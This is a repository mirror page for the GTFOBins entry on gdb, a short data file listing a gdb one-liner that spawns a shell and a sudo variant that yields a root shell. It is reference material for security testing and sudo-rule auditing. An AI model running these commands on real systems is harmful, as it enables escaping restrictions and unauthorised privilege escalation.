1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-22 15:51:34 +01:00
GTFOBins.github.io/_gtfobins/gdb.md
2018-05-25 15:30:02 +02:00

8 lines
141 B
Markdown

---
functions:
execute-interactive:
- code: gdb -nx -ex '!sh' -ex quit
sudo-enabled:
- code: sudo gdb -nx -ex '!sh' -ex quit
---